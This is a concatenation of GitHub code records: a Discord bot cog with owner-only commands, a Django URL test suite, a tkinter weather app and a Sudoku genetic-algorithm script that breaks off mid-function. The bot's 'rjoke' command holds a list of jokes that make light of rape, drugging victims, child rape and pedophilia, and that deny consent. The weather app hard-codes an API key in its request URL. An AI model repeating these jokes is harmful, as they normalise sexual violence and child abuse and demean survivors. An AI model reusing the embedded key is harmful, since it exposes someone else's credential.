ctx):\r\n\t await ctx.send(f\"Hasta Luego :wave:\")\r\n\t await self.bot.close()\r\n\r\n\t@commands.command(\"test\")\r\n\t@commands.is_owner()\r\n\tasync def testing(self, ctx):\r\n\t await ctx.send(f\"I work as intended :D\")\r\n\r\n\t@commands.command(name=\"owner\")\r\n\t@commands.is_owner()\r\n\tasync def forbidden_commands(self, ctx):\r\n\r\n\t embed = discord.Embed(title=f'Owner Only Commands', description='Here are my __OWNER-ONLY__ Modules! Type These In My DMs', colour=0xC0C0C0, timestamp=ctx.message.created_at)\r\n\r\n\t embed.add_field(name='Turns off the bot', value=\"`c!logout`\", inline=False)\r\n\t embed.add_field(name='DM Anyone you want.', value=\"`c!dm `\", inline=False)\r\n\t embed.add_field(name='Sends The Shard Count.', value=\"`c!present_shard`\", inline=False)\r\n\t embed.add_field(name='Bypass all checks & cooldowns.', value=\"`c!sudo `\", inline=False)\r\n\t embed.add_field(name='Disables a command', value=\"`c!unload `\", inline=False)\r\n\t embed.add_field(name='Enables a disabled command', value=\"`c!reload `\", inline=False)\r\n\t embed.add_field(name='Pushes an Announcement to the Cryptide server for a new release', value=\"`c!release`\", inline=False)\r\n\t embed.add_field(name='Updates the bot', value=\"`c!update `\", inline=False)\r\n\t embed.add_field(name='Sends a list of servers the bot is in', value=\"`c!servers`\", inline=False)\r\n\r\n\t embed.set_footer(text=f\"Carpe Noctem | {self.bot.user.name}\")\r\n\t embed.set_author(name=self.bot.user.name, icon_url=self.bot.user.avatar_url)\r\n\r\n\t await ctx.author.send(embed=embed)\r\n\t await ctx.send(\"I've DM'd You The List!\")\r\n\r\n\t@commands.command()\r\n\tasync def nsfwexperimental(self, ctx):\r\n\t await ctx.send(akaneko.nsfw.masturbation())\r\n\r\n\t@commands.command()\r\n\tasync def rjoke(self, ctx):\r\n\t\tif ctx.channel.is_nsfw():\r\n\t\t\ttitles = ['What do 9 out of 10 people enjoy? \\ngang rape :D',\r\n\t \t'Rape is such an ugly word, I prefer the term struggle snuggle.',\r\n\t \t'I saw a man trying to rape a girl, i decided to help, she didn’t stand a chance against both of us',\r\n\t \t'99% of women kiss with their eyes closed, that’s why it’s so hard to identify the rapist.',\r\n\t \t'No means no, but if you use chloroform it’s a guaranteed yes.',\r\n\t \t'Guy walks into a bar. Sees a hot girl. Walks up to her and says “your getting laid tonight” She replies “what are you some sort of psychic” He says “No i’m just stronger than you”.',\r\n\t \t'How can you tell that a pedophile likes music? \\nHe rapes D minor',\r\n\t \t'If you’re ever bored, just rape an orphan! What’re they gonna do, tell their parents?',\r\n\t \t'What’s the hardest thing about losing your virginity? Making sure she doesn’t wake up.',\r\n\t \t'Its only rape if she finds out.',\r\n\t \t'What do You call a gun that rapes someone? An assault rifle.',\r\n\t \t'Consent is just some fucked up feminist propaganda.',\r\n\t \t'She said no. So I raped her.']\r\n\t\t\tawait ctx.send(f\"{random.choice(titles)}\")\r\n\t\telse:\r\n\t\t\tawait ctx.send(\"HEY! What are you doing??? This isn't an NSFW Channel....\")\r\n\r\n\r\n\t@commands.command()\r\n\t@commands.is_owner()\r\n\tasync def present_shard(self, ctx):\r\n\t shard = discord.AutoShardedClient\r\n\t await ctx.send(f\"{shard.shards} Is Present\")\r\n\r\n\t@commands.command(name=\"unload\")\r\n\t@commands.is_owner()\r\n\tasync def unload(self, ctx, command_name):\r\n\t command = self.bot.get_command(command_name)\r\n\t command.enabled = False\r\n\t await ctx.send(f\"`{command_name}` has been unloaded.\")\r\n\r\n\t@commands.command(name=\"reload\")\r\n\t@commands.is_owner()\r\n\tasync def reload(self, ctx, command_name):\r\n\t command = self.bot.get_command(command_name)\r\n\t command.enabled = True\r\n\t await ctx.send(f\"`{command_name}` has been reloaded.\")\r\n\r\n\t@commands.command()\r\n\t@commands.is_owner()\r\n\tasync def release(self, ctx):\r\n\t release_role_id = 827825413706481664\r\n\t release_ping_str = f\"<@&{release_role_id}>\"\r\n\r\n\t questions = [\r\n [\r\n \"What type of release is this?\",\r\n \"1 | Regular Release\\n2 | Security Release\",\r\n ],\r\n [\"What version are you releasing?\", \"\\u2009\"],\r\n [\"What is the content for this release?\", \"\\u2009\"],\r\n ]\r\n\t answers = [\r\n\t await get_message(self.bot, ctx, question[0], question[1], timeout=500)\r\n\t for question in questions\r\n ]\r\n\r\n\t color_enum = {\r\n \"1\": 0x6E6E6E, # Dark Color\r\n \"2\": 0x4D4D4D, # Even Darker Color\r\n }\r\n\t color = color_enum.get(answers[0], 0x6E6E6E)\r\n\r\n\t tag = answers[1]\r\n\t if \"v\" not in tag.lower():\r\n\t tag = f\"V{tag}\"\r\n\t tag = tag.capitalize().replace(\" \", \"\")\r\n\r\n\t desc = f\"{answers[2]}\\n\\n------------\\nEnjoy :D\"\r\n\r\n\t embed = discord.Embed(\r\n title=f\"**Bot Release:** `{tag}`\",\r\n description=desc,\r\n color=color,\r\n timestamp=ctx.message.created_at,\r\n )\r\n\t embed.set_footer(text=ctx.author.name, icon_url=ctx.author.avatar_url)\r\n\r\n\t if await review_embed(self.bot, ctx, embed):\r\n\t channel = await self.bot.fetch_channel(827772052337328170)\r\n\t await channel.send(release_ping_str, embed=embed)\r\n\t await ctx.send(f\"Announcement Sent.\")\r\n\t else:\r\n\t await ctx.send(\"Cancelled.\")\r\n\r\ndef setup(bot):\r\n bot.add_cog(Forbidden(bot))", "repo_name": "akaKawasaki/cryptide-db", "sub_path": "Cryptide/__modules__/Forbidden.py", "file_name": "Forbidden.py", "file_ext": "py", "file_size_in_byte": 6401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 27, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 27, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 32, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 38, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 38, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 39, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 39, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 44, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 44, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 45, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 45, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 53, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 49, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 49, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 50, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 50, "usage_type": "name"}, {"api_name": "akaneko.akaneko.nsfw.masturbation", "line_number": 73, "usage_type": "call"}, {"api_name": "akaneko.akaneko.nsfw", "line_number": 73, "usage_type": "attribute"}, {"api_name": "akaneko.akaneko", "line_number": 73, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 71, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 71, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 91, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 75, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 75, "usage_type": "name"}, {"api_name": "discord.AutoShardedClient", "line_number": 99, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.command", "line_number": 96, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 96, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 97, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 97, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 102, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 102, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 103, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 103, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 109, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 109, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 110, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 110, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 148, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 116, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 116, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 117, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "10887510282", "text": "from http import HTTPStatus\nfrom django.contrib.auth import get_user_model\nfrom django.core.cache import cache\nfrom django.test import TestCase, Client\nfrom django.urls import reverse\n\nfrom ..models import Group, Post\n\nUser = get_user_model()\n\n\nclass ProjectURLTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.authorized_client = Client()\n cls.authors_client = Client()\n cls.authorized_user = User.objects.create_user(username='HasNoName')\n cls.authorized_client.force_login(cls.authorized_user)\n cls.post_author = User.objects.create(username='TestAuthor')\n cls.authors_client.force_login(cls.post_author)\n\n cls.post = Post.objects.create(\n author=cls.post_author,\n text='Test text',\n )\n cls.group = Group.objects.create(\n title='Test group',\n description='Big Bada Boom!',\n slug='test_group',\n )\n\n cls.unauthorized_user_available_pages = {\n reverse('posts:index'): 'posts/index.html',\n reverse('posts:group_list', args=(cls.group.slug,)):\n 'posts/group_list.html',\n reverse('posts:profile', args=(cls.post_author.username,)):\n 'posts/profile.html',\n reverse('posts:post_detail', args=(cls.post.id,)):\n 'posts/post_detail.html'\n }\n\n def setUp(self):\n cache.clear()\n\n def test_unauthorized_pages_availability(self):\n \"\"\"Check if anonymous-allowed pages are available\n for an anonymous user.\"\"\"\n\n for url in self.unauthorized_user_available_pages:\n with self.subTest(url=url):\n response = self.client.get(url)\n self.assertEqual(response.status_code, HTTPStatus.OK, url)\n\n def test_unauthorized_templates_correctness(self):\n \"\"\"Are expected templates available to an unauthorized user.\"\"\"\n\n for address, tmpl in self.unauthorized_user_available_pages.items():\n with self.subTest(address=address):\n response = self.client.get(address)\n self.assertEqual(response.status_code, HTTPStatus.OK, address)\n self.assertTemplateUsed(response, tmpl)\n\n def test_edit_other_persons_post_redirect(self):\n \"\"\"Check redirects when an authenticated user tries\n to edit other user's post.\"\"\"\n\n response = self.authorized_client.get(\n reverse('posts:post_edit', args=(self.post.id,)), follow=True\n )\n self.assertRedirects(\n response, reverse('posts:post_detail', args=(self.post.id,))\n )\n\n def test_unauthorized_user_private_pages_redirect(self):\n \"\"\"Check if the redirects are working when an unauthenticated\n user visits private pages.\"\"\"\n\n login_url = reverse('users:login')\n pages = {\n reverse('posts:post_create'),\n reverse('posts:post_edit', args=(self.post.id,))\n }\n for url in pages:\n with self.subTest(url=url):\n response = self.client.get(url, follow=True)\n self.assertRedirects(\n response, f'{login_url}?next={url}'\n )\n\n def test_edit_and_create_availability_for_post_author(self):\n \"\"\"Are the pages available when an authorized user\n creates or edits a post.\"\"\"\n\n pages = {\n reverse('posts:post_create'),\n reverse('posts:post_edit', args=(self.post.id,))\n }\n for url in pages:\n with self.subTest(url=url):\n response = self.authors_client.get(url)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_authors_create_and_edit_templates(self):\n \"\"\"Check if the templates are correct when an authorized\n user creates or edits a post.\"\"\"\n\n correct_templates = {\n reverse('posts:post_create'): 'posts/create_post.html',\n reverse('posts:post_edit', args=(self.post.id,)):\n 'posts/create_post.html',\n }\n for address, tmpl in correct_templates.items():\n with self.subTest(address=address):\n response = self.authors_client.get(address)\n self.assertTemplateUsed(response, tmpl)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n", "repo_name": "holohup/yatube_subscriptions_en", "sub_path": "yatube/posts/tests/test_urls.py", "file_name": "test_urls.py", "file_ext": "py", "file_size_in_byte": 4362, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 9, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "django.test.Client", "line_number": 16, "usage_type": "call"}, {"api_name": "django.test.Client", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Post.objects.create", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 23, "usage_type": "name"}, {"api_name": "models.Group.objects.create", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 27, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 39, "usage_type": "call"}, {"api_name": "django.core.cache.cache.clear", "line_number": 44, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 44, "usage_type": "name"}, {"api_name": "http.HTTPStatus.OK", "line_number": 53, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 53, "usage_type": "name"}, {"api_name": "http.HTTPStatus.OK", "line_number": 61, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 61, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 69, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 72, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 79, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 81, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 82, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 96, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 97, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 102, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 102, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 109, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 110, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 117, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "74360013955", "text": "import tkinter as tk\r\nfrom tkinter import *\r\nimport requests\r\nimport time\r\nimport datetime\r\n\r\n\r\ndef getData(self):\r\n city = inputbox.get()\r\n api = \"https://api.openweathermap.org/data/2.5/weather?q=\" + \\\r\n city+\"&appid=06c921750b9a82d8f5d1294e1586276f\"\r\n\r\n json_data = requests.get(api).json()\r\n city = json_data['name']\r\n country = json_data['sys']['country']\r\n temperature = int(json_data['main']['temp'] - 273.15)\r\n icon = json_data['weather'][0]['icon']\r\n weather = json_data['weather'][0]['main']\r\n min_temp = int(json_data['main']['temp_min'] - 273.15)\r\n max_temp = int(json_data['main']['temp_max'] - 273.15)\r\n humidity = json_data['main']['humidity']\r\n wind = json_data['wind']['speed']\r\n timezone = json_data['timezone']\r\n timedifference = timezone - 19800\r\n sunrise = time.strftime('%H:%M', time.gmtime(\r\n json_data['sys']['sunrise'] + timezone))\r\n sunset = time.strftime('%H:%M', time.gmtime(\r\n json_data['sys']['sunset'] + timezone))\r\n\r\n final_info = city + \", \" + country + \"\\n\" + str(temperature) + \"°C\"\r\n final_data = \"\\n\" + weather + \"\\n\" + \"Min/Max: \" + str(min_temp)+\"/\"+str(max_temp) + \"°C\" + \"\\n\" + \"Humidity: \" + str(\r\n humidity) + \"%\" + \"\\n\" + \"Wind Speed: \" + str(wind) + \"km/h \\n\" + \"Sunrise: \" + sunrise + \"hrs \\n\" + \"Sunset: \" + sunset + \"hrs\"+\"\\nLocal Time: \"+getTime(timedifference)\r\n\r\n label1.config(text=final_info)\r\n label3.config(text=final_data)\r\n\r\n image = PhotoImage(file=f\"resources/icons/{icon}.png\")\r\n label2.config(image=image, bg=\"sky blue\")\r\n label2.image = image\r\n\r\n\r\n# structure\r\napp = tk.Tk()\r\napp.geometry(\"360x480\")\r\napp.title(\"Weather App.\")\r\napp.resizable(False, False)\r\napp.iconbitmap(\"resources/icon.ico\")\r\napp.config(bg=\"sky blue\")\r\n\r\n# fonts\r\nfont0 = (\"Calibri\", 10, \"bold\", \"italic\")\r\nfont1 = (\"Calibri\", 15, \"bold\")\r\nfont2 = (\"Calibri\", 20, \"bold\")\r\nfont3 = (\"Calibri\", 30, \"bold\")\r\n\r\n# input\r\ninputbox = tk.Entry(app, font=font1, bg=\"white\", width=50, text=\"Bengaluru\")\r\ninputbox.pack(padx=25, pady=10)\r\ninputbox.focus()\r\ninputbox.bind('', getData)\r\n\r\n# labels\r\nlabel0 = tk.Label(app, font=font0, bg=\"sky blue\", text=\"enter city name...\")\r\nlabel0.pack()\r\nlabel1 = tk.Label(app, font=font3, bg=\"sky blue\")\r\nlabel1.pack()\r\nlabel2 = tk.Label(app)\r\nlabel2.pack()\r\nlabel3 = tk.Label(app, font=font1, bg=\"sky blue\")\r\nlabel3.pack()\r\n\r\n\r\ndef getTime(timedifference):\r\n now = time.time()\r\n localtime = now + timedifference\r\n timestr = datetime.datetime.strptime(\r\n time.ctime(localtime), \"%a %b %d %H:%M:%S %Y\")\r\n timestr = timestr.strftime(\"%H:%Mhrs %a, %d %b %Y\")\r\n return timestr\r\n\r\n\r\napp.mainloop()\r\n", "repo_name": "BennettChristopher/WeatherApp", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2679, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 25, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 25, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 27, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 27, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 43, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 57, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 63, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 67, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 69, "usage_type": "call"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 76, "usage_type": "attribute"}, {"api_name": "time.ctime", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "9683993517", "text": "import matplotlib.pyplot as plt\nfrom random import choice, randint, uniform, shuffle, sample\n\n\n####################\n# FITNESS FUNCTION #\n####################\ndef extract_subgrids(sudoku_grid, i):\n \"\"\"\n Extract the 9 elements from a (3 x 3) grid cell in a (9 x 9) Sudoku solution.\n :param sudoku_grid: The specified 9 x 9 Sudoku solution grid.\n :param i: The specified index of the column\n :return: Returns a list of 9 integers that are part of a specified Sudoku sub-grid.\n \"\"\"\n return sudoku_grid[i:i + 3] + sudoku_grid[i + 9:i + 12] + sudoku_grid[i + 18:i + 21]\n\n\ndef extract_all_subgrids(sudoku_grid):\n \"\"\"\n Divide a flat vector into vectors with 9 elements, representing 3 x 3 boxes in the corresponding 9 x 9 2D vector.\n These are the standard Sudoku boxes.\n :param sudoku_grid: The specified 9 x 9 Sudoku solution\n :return: Returns the list of 3 x 3 grids in a 9 x 9 Sudoku solution\n \"\"\"\n return [extract_subgrids(sudoku_grid, i) for i in [0, 3, 6, 27, 30, 33, 54, 57, 60]]\n\n\ndef make_sudoku_2D(sudoku_grid):\n \"\"\"\n Function will take a flat vector and make the row of 9 x 9 Sudoku grid 2-D.\n :param sudoku_grid: The specified 9 x 9 Sudoku solution\n :return: Returns a list of 81 integers, which removes the (9 x 9) dimension to make the Sudoku grid 2-D\n \"\"\"\n return [sudoku_grid[i * 9:(i + 1) * 9] for i in range(9)]\n\n\ndef consistency(sudoku_grid):\n \"\"\"\n Function will check how many different elements there are in each row. Ideally there should be 9 different elements,\n if there are no duplicates. This function can also be used for columns by applying the built-in zip() function\n as such: zip(*sudoku_grid).\n :param sudoku_grid: Check how many different elements there are in each row. Ideally there should be 9 different\n elements, if there are no duplicates.\n :return: Returns an integer value for the number of conflicts\n \"\"\"\n conflict_score = 0\n visited = []\n\n # Iterate through every cell in every row in a 9x9 Sudoku grid.\n for row in sudoku_grid:\n for i in range(len(row)):\n # If cell value has not been visited, append its index into the visited list.\n if row[i] not in visited:\n visited.append(row[i])\n else:\n conflict_score += 1\n visited = []\n\n return conflict_score\n\n\ndef fitness_sudoku(candidate_solution):\n \"\"\"\n Solution strings are evaluated by counting the number of duplicate symbols in rows or columns, creating a fitness\n score. Fewer duplicates presumably means a better solution string. This will be determined by that fitness score.\n :param candidate_solution: An individual candidate solution for a sudoku puzzle to be specified\n :return: Returns the total fitness score of the evaluated candidate solution for a sudoku puzzle.\n \"\"\"\n\n # Checks consistency of the rows by giving fitness score based on the number of conflicts in each row.\n sudoku_solution = make_sudoku_2D(candidate_solution)\n fitness_score = consistency(sudoku_solution)\n\n # Checks consistency of columns by giving fitness score based on the number of conflicts in each column.\n fitness_score += consistency(zip(*sudoku_solution))\n\n # Checks consistency of sub-sudoku grids by giving fitness score based on number of conflicts in each (3 x 3) grid.\n fitness_score += consistency(extract_all_subgrids(candidate_solution))\n\n return fitness_score\n\n\n###############################\n# INDIVIDUAL -LEVEL OPERATORS #\n###############################\n\n# FUNCTIONS FOR GENERATING SUDOKU GRID SOLUTION SPACES\ndef generate_sudoku_grid(filename):\n \"\"\"\n Function combines the following 3 functions below to easily generate a (9 x 9) Sudoku grid, where all numbers that\n were in the text file are filled and fixed into their corresponding positions, while all the “.” characters are\n replaced into the integer zeros, and later filled in with numbers ranging from 1 to 9.\n :param filename: The specified text file\n :return: List of lists of integers with all 0s replaced.\n \"\"\"\n sudoku_list = divideList(generate_array(filename), 9)\n random_solution = replaceZeros(sudoku_list)\n return random_solution\n\n\ndef generate_array(filename):\n \"\"\"\n Function generates a list of 81 integers by replacing any '.' with a 0, and subsequently ignoring any other\n character from a specified textfile that is not going to be part of the list.\n :param filename: The file path to be specified.\n :return: A list of 81 integers.\n \"\"\"\n sudoku_list_of_numbers = []\n sudokuGrid = open(filename, \"r\")\n\n # For each line in the text file, strip() will get rid of white space at the beginning and end of the string, while\n # split() helps get a list, with no specified delimiter.\n for eachLine in sudokuGrid:\n eachLine.strip().split()\n\n for character in eachLine:\n if character == '.':\n sudoku_list_of_numbers.append(0)\n\n elif character == '-' or character == '\\n' or character == '!':\n continue\n\n else:\n sudoku_list_of_numbers.append(int(character))\n\n return sudoku_list_of_numbers\n\n\ndef replaceZeros(created_grid):\n \"\"\"\n Function replaces 0 with a random value from 1 to 9, essentially filling an unfilled Sudoku cell.\n :param created_grid: The list of lists (sudoku grid) to be specified\n :return: Returns the newly non-zero sudoku grid\n \"\"\"\n candidate_grid = []\n\n # First for-loop cycles through every row of the created grid from the text file\n for every_row in created_grid:\n candidate_row = []\n\n # For each row, it will check whether the number in the given index is 0, meaning that Sudoku cell is unfilled.\n for number in range(0, 9):\n\n # If 0, attempt to replace that 0 with a random integer ranging from 1 to 9\n if every_row[number] == 0:\n rand_number = randint(1, 9)\n\n # While the random number exists in the current row or the new candidate row list, attempt to generate\n # another random value from 1 to 9 to replace old integer value of rand_number\n while rand_number in every_row or rand_number in candidate_row:\n rand_number = randint(1, 9)\n\n # Append that number onto the currently-checked row\n candidate_row.append(rand_number)\n\n # Otherwise, if that value in the given index of that Sudoku row is anything but 0, append it.\n # This ensures that numbers from the text file that were initially hardcoded onto the file will remain in\n # the following sudoku row, unless it is a 0 (Represents \".\").\n else:\n candidate_row.append(every_row[number])\n\n # After all numbers have been filled in the selected row, append it to a new list, which will create and form\n # the 9 x 9 sudoku grid.\n candidate_grid.append(candidate_row)\n\n return candidate_grid\n\n\ndef divideList(sudoku_list, number_of_sublists):\n \"\"\"\n Function divides the list of 81 integers into 9 small sub-lists of integers.\n :param sudoku_list: The list of integers to be specified.\n :param number_of_sublists: The desired number of sub-lists in the list.\n :return: A list of sub-lists of integers.\n \"\"\"\n number_of_sublists = max(1, number_of_sublists)\n list_of_lists = [sudoku_list[i:i + number_of_sublists] for i in range(0, len(sudoku_list), number_of_sublists)]\n return list_of_lists\n\n\n# Crossover Operator for Chosen Representation\ndef crossover_individual(sudoku_grid1, sudoku_grid2):\n \"\"\"\n Returns a list of randomly chosen rows from 2 sudoku grids. This is a uniform crossover, where bits are randomly\n copied from the first or from the second parent\n :param sudoku_grid1: The first sudoku grid, which will be random.\n :param sudoku_grid2: The second sudoku grid, which will be random.\n :return: A list of sudoku rows of 9 integers from different sudoku grids.\n \"\"\"\n # Performs a uniform crossover by zipping 2 candidate solutions together and extracting a row from them, creating\n # a new breed.\n return [choice(row) for row in zip(sudoku_grid1, sudoku_grid2)]\n\n\n# Mutation Operator for Chosen Representation\ndef mutate_individual(sudoku_grid, filename):\n \"\"\"\n Function performs swapping of numbers in a random number of rows, depending on the fitness score of the candidate\n Sudoku solution grid. Number swapping will only happen on those that were originally represented as \".\" in the text\n file.\n :param sudoku_grid: The specified list of lists, representing a 9 x 9 sudoku grid.\n :param filename: The specified text file\n :return: The same sudoku grid with the specified rows swapped.\n \"\"\"\n # The base_grid is a form of reference to properly select which numbers to swap without affecting the predetermined\n # cells. Within this function, the base_grid will be used to cross-check and also make use of the same text file\n # used to create the candidate solutions\n base_grid = divideList(generate_array(filename), 9)\n\n # This is a list to store all indexes of the possible sudoku cells that can be swapped with one another.\n rand_index = []\n randomness = uniform(0, 1)\n\n # rand_row = randint(0, 8)\n # rand_sub_row = randint(0, 2)\n\n # This selects the number of rows chosen to mutate depending on the fitness score of a candidate solution.\n # If fitness score / 5 is greater than 8, the minimum number of rows being selected will be 8.\n num_rows = min(8, fitness_sudoku(sudoku_grid) // 5)\n row_indexes = sample([x for x in range(9)], num_rows)\n\n for i in row_indexes:\n for number in range(len(base_grid[i])):\n\n # If the value found on the specified row of the base grid is 0, append that index into the rand_index list.\n if base_grid[i][number] == 0:\n rand_index.append(base_grid[i][number])\n\n elif base_grid[i][number] != 0:\n continue\n\n # If the length of the list of indexes is greater than 1, shuffle them and extract 2 indexes based on a pop().\n if len(rand_index) > 1 and randomness > MUTATION_RATE:\n shuffle(rand_index)\n rand1 = rand_index.pop()\n rand2 = rand_index.pop()\n\n # This is where 2 of the random indexes will be used to select sudoku cells on the same row and swap their\n # values.\n temp = sudoku_grid[i][rand1]\n sudoku_grid[i][rand1] = sudoku_grid[i][rand2]\n sudoku_grid[i][rand2] = temp\n\n # Pencil marking, checking whether\n\n return sudoku_grid\n\n\n##############################\n# POPULATION-LEVEL OPERATORS #\n##############################\n# Loops through the population size\ndef generate_population(filename, population_size):\n \"\"\"\n Function takes specified file path to generate the solution spaces for a specified population size, which is\n essentially the number of possible sudoku solutions to be generated.\n :param filename: The specified text file.\n :param population_size: The desired population integer size.\n :return: Finding the sudoku solution spaces according to the population size (integer).\n \"\"\"\n population_list = []\n\n # In this loop, for a number of iterations based on the popoulation size, every candidate solution generated will\n # be appended\n for each_solution in range(population_size):\n solution_space = generate_sudoku_grid(filename)\n population_list.append(solution_space)\n\n return population_list\n\n\ndef generate_fitness_scores(pop_list):\n \"\"\"\n Function goes through a population size list of sudoku gird solutions, iterates through them and produces a fitness\n score for each of them, stored in a list.\n :param pop_list: The specified population size list of sudoku solution spaces.\n :return: A list of fitness scores based on the number of solution spaces specified in population list.\n \"\"\"\n # Initialise a flat, 2-D list.\n flat_list = []\n fitness_scores = []\n\n # Iterate through each solution space\n for each_solution in pop_list:\n # Ensure that you append all values in one solution space into a flat, 2-D list.\n for each_row in each_solution:\n for number in each_row:\n flat_list.append(number)\n\n # Find the fitness score of that solution list of integers, then append and reset flat_list = []\n fitness_score = fitness_sudoku(flat_list)\n fitness_scores.append(fitness_score)\n flat_list = []\n\n return fitness_scores\n\n\ndef select_population(population_list, fitness_population):\n \"\"\"\n Selects a specified percentage of the a list of candidate sudoku solutions by firstly sorting the population based\n on fitness scores on every candidate solution, and only taking a specified percentage of them to be used in the\n evolutionary algorithm.\n :param population_list: The list population_lists.\n :param fitness_population: The list fitness_scores.\n :return: A new list of selected individuals that will be used in the evolutionary algorithm.\n \"\"\"\n sorted_population = sorted(zip(population_list, fitness_population), key=lambda ind_fit: ind_fit[1])\n\n # Returns a new list of selected individuals that will be used in the evolutionary algorithm based on the truncation\n # rate.\n return [ind_sudoku for ind_sudoku, fitness in sorted_population[0: int(POPULATION_SIZE * TRUNCATION_RATE)]]\n\n\ndef crossover_population(mating_pool_list):\n \"\"\"\n Function uses crossover_individual() function to perform a uniform crossover between two parents to produce an\n offspring. This process creates a number of offsprings aimed to refill the population of the original mating pool\n back to the original population size, and then undergo crossover in the process of the evolutionary algorithm.\n This preserves the previously best-selected individuals from the initial population, and achieves population\n diversity.\n :param mating_pool_list: The list population_lists.\n :return: Returns a list of newly bred candidate Sudoku solutions including the best chosen ones from the\n initial truncation selection.\n \"\"\"\n offspring_list = []\n\n # Creates the offsprings every iteration, and appends it onto an offspring list\n for crossovers in range(POPULATION_SIZE - len(mating_pool_list)):\n crossed_over_grid = crossover_individual(choice(mating_pool_list), 